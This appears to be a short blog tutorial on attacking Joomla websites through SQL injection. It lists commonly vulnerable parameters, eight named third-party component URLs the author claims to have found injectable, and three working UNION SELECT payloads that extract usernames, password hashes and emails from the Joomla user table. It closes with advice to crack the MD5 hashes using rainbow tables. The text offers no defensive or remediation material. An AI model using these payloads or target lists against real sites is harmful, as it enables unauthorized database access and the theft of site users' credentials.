The probably most common case for
hacked Joomla websites
is that a SQL injection vulnerability was exploited. A typical URL which is affected by this type of vulnerability looks like this:
index.php?option=com_blabla&category=5&Item=2
Typically the following parameters are vulnerable:
- cat, category, kat, categories, kats, cats
- id, userid, katid, catid
- sometimes also Item, entry, page
You can find out if a parameter is vulnerable when you change its value from e.g.
category=5 to category='
.
Press enter and look for
MySQL errors
in the website. If you find one, you might have discovered a SQL inkjection vulnerability.
In order to give you a better understanding and feeling of how vulnerable URLs might look like, I just show you some URLs which are known to be vulnerable (I discovered them):
URL:
index.php?option=com_jp_jobs&view=detail&id=1
Vulnerable parameter:
id
URL:
index.php?option=com_mv_restaurantmenumanager&task=menu_display\Venue=XX&mid=XX&Itemid=XX
Vulnerable parameter:
mid
URL:
index.php?option=com_qpersonel&task=qpListele&katid=2
Vulnerable parameter:
katid
URL:
index.php?com_pandafminigames&Itemid=&task=myscores&userid=2
Vulnerable parameter:
userid
URL:
index.php?option=com_joltcard&Itemid=21&task=view&cardID=6
Vulnerable parameter:
cardID
URL:
index.php?com_bfquiztrial&view=bfquiztrial&catid=1&Itemid=62
Vulnerable parameter:
catid
URL:
index.php?com_golfcourseguide&view=golfcourses&cid=1&id=79
Vulnerable parameter:
id
URL:
index.php?option=com_nkc&view=insc&lang=en&gp=10
Vulnerable parameter:
gp
Notice how many parameters look familiar to you? Yes, I mentioned them earlier as well-known parameters which are affected on regular basis :)
Since every Joomla database contains the same structure (like the same tables etc.), we know enough to inject a SQL statement:
Example #1:
index.php?option=com_qpersonel&task=qpListele&katid=XX+AND+1=2+UNION+\SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,concat(\username, password)--
Example #2:
index.php?option=com_pandafminigames&Itemid=&task=myscores&userid=XX+\AND+1=2+UNION+SELECT+concat(password),2,concat(password),4,5,6,7,\8,9,10,11,12--
Example #3:
index.php?option=com_jp_jobs&view=detail&id=1+AND+1=2+UNION+SELECT+\group_concat(0x503077337220743020743368206330777321,name,username,\password,email,usertype,0x503077337220743020743368206330777321)--
The selected information will be shown within the website.
Select a username and password from the table and try to crack the MD5 hash with the help of raindbow tables.
SQL injections in Joomla give us so much freedom as we can get. You can select everything you want from the database, and if you are lucky, there are also other tables in the databases which do not belong to Joomla but still contain some very interesting information.